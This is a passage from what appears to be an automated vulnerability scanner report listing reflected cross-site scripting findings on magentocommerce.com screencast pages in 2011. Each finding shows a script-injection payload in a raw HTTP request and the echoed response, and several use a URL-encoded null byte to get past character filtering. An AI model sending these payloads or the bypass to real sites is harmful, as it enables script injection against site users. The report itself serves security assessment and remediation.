...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/designers-guide-1f4ebd"><script>alert(1)</script>0b0eb7b22d1/view">
...[SNIP]...
1.18. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/designers-guide-1/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00def0b"><script>alert(1)</script>c6549ed30de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as def0b"><script>alert(1)</script>c6549ed30de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/designers-guide-1/view?%00def0b"><script>alert(1)</script>c6549ed30de=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176140; expires=Sat, 11-Aug-2012 15:09:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Fscreencasts%2Fdesigners-guide-1%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:00 GMT
Content-Length: 37527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/designers-guide-1/view?%00def0b"><script>alert(1)</script>c6549ed30de=1">
...[SNIP]...
1.19. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/gift-certificates-cards/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60c40"><script>alert(1)</script>c1bbef6f38a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/gift-certificates-cards60c40"><script>alert(1)</script>c1bbef6f38a/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176170; expires=Sat, 11-Aug-2012 15:09:30 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:31 GMT
Content-Length: 33506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/gift-certificates-cards60c40"><script>alert(1)</script>c1bbef6f38a/view">
...[SNIP]...
1.20. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/gift-certificates-cards/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0030566"><script>alert(1)</script>1b56dd24d01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30566"><script>alert(1)</script>1b56dd24d01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/gift-certificates-cards/view?%0030566"><script>alert(1)</script>1b56dd24d01=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176072; expires=Sat, 11-Aug-2012 15:07:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fmedia%2Fscreencasts%2Fgift-certificates-cards%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:52 GMT
Content-Length: 33368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view?%0030566"><script>alert(1)</script>1b56dd24d01=1">
...[SNIP]...
1.21. http://www.magentocommerce.com/media/screencasts/grouped-products/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/grouped-products/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee831"><script>alert(1)</script>08d6ab08592 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/grouped-productsee831"><script>alert(1)</script>08d6ab08592/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176334; expires=Sat, 11-Aug-2012 15:12:14 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:14 GMT
Content-Length: 33499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/grouped-productsee831"><script>alert(1)</script>08d6ab08592/view">
...[SNIP]...
1.22. http://www.magentocommerce.com/media/screencasts/grouped-products/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/grouped-products/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006d1e3"><script>alert(1)</script>aba8c91f3b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d1e3"><script>alert(1)</script>aba8c91f3b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/grouped-products/view?%006d1e3"><script>alert(1)</script>aba8c91f3b4=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176258; expires=Sat, 11-Aug-2012 15:10:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fmedia%2Fscreencasts%2Fgrouped-products%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:58 GMT
Content-Length: 33173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/grouped-products/view?%006d1e3"><script>alert(1)</script>aba8c91f3b4=1">
...[SNIP]...
1.23. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/introducing-the-magento-enterprise-edition/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7ecf"><script>alert(1)</script>ff43114dd65 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/introducing-the-magento-enterprise-editionc7ecf"><script>alert(1)</script>ff43114dd65/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176165; expires=Sat, 11-Aug-2012 15:09:25 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:25 GMT
Content-Length: 33525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-editionc7ecf"><script>alert(1)</script>ff43114dd65/view">
...[SNIP]...
1.24. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/introducing-the-magento-enterprise-edition/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0010cbe"><script>alert(1)</script>0bc041d5609 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 10cbe"><script>alert(1)</script>0bc041d5609 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/introducing-the-magento-enterprise-edition/view?%0010cbe"><script>alert(1)</script>0bc041d5609=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176067; expires=Sat, 11-Aug-2012 15:07:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A67%3A%22%2Fmedia%2Fscreencasts%2Fintroducing-the-magento-enterprise-edition%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:48 GMT
Content-Length: 33370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view?%0010cbe"><script>alert(1)</script>0bc041d5609=1">
...[SNIP]...
1.25. http://www.magentocommerce.com/media/screencasts/landing-pages/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/landing-pages/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26f38"><script>alert(1)</script>f7a0f786ba8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/landing-pages26f38"><script>alert(1)</script>f7a0f786ba8/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176307; expires=Sat, 11-Aug-2012 15:11:47 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:48 GMT
Content-Length: 33496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/landing-pages26f38"><script>alert(1)</script>f7a0f786ba8/view">
...[SNIP]...
1.26. http://www.magentocommerce.com/media/screencasts/landing-pages/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/landing-pages/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b1897"><script>alert(1)</script>5cb5f08d5e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1897"><script>alert(1)</script>5cb5f08d5e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/landing-pages/view?%00b1897"><script>alert(1)</script>5cb5f08d5e7=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176204; expires=Sat, 11-Aug-2012 15:10:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Fscreencasts%2Flanding-pages%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:04 GMT
Content-Length: 36310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/landing-pages/view?%00b1897"><script>alert(1)</script>5cb5f08d5e7=1">
...[SNIP]...
1.27. http://www.magentocommerce.com/media/screencasts/permissions/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/permissions/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1385"><script>alert(1)</script>c0704bd17d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/permissionsc1385"><script>alert(1)</script>c0704bd17d3/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176230; expires=Sat, 11-Aug-2012 15:10:30 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:30 GMT
Content-Length: 33494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/permissionsc1385"><script>alert(1)</script>c0704bd17d3/view">
...[SNIP]...
1.28. http://www.magentocommerce.com/media/screencasts/permissions/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/permissions/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0075a4d"><script>alert(1)</script>e0c36da2c0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75a4d"><script>alert(1)</script>e0c36da2c0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/permissions/view?%0075a4d"><script>alert(1)</script>e0c36da2c0b=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176152; expires=Sat, 11-Aug-2012 15:09:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fmedia%2Fscreencasts%2Fpermissions%2Fview%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A4%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:12 GMT
Content-Length: 35313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/permissions/view?%0075a4d"><script>alert(1)</script>e0c36da2c0b=1">
...[SNIP]...
1.29. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd2a4"><script>alert(1)</script>c0886635f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/private-sales-including-events-invitations-and-category-access-permissionsfd2a4"><script>alert(1)</script>c0886635f2/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176150; expires=Sat, 11-Aug-2012 15:09:10 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:10 GMT
Content-Length: 33556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissionsfd2a4"><script>alert(1)</script>c0886635f2/view">
...[SNIP]...
1.30. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0091413"><script>alert(1)</script>c91b0ff721a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91413"><script>alert(1)</script>c91b0ff721a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view?%0091413"><script>alert(1)</script>c91b0ff721a=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
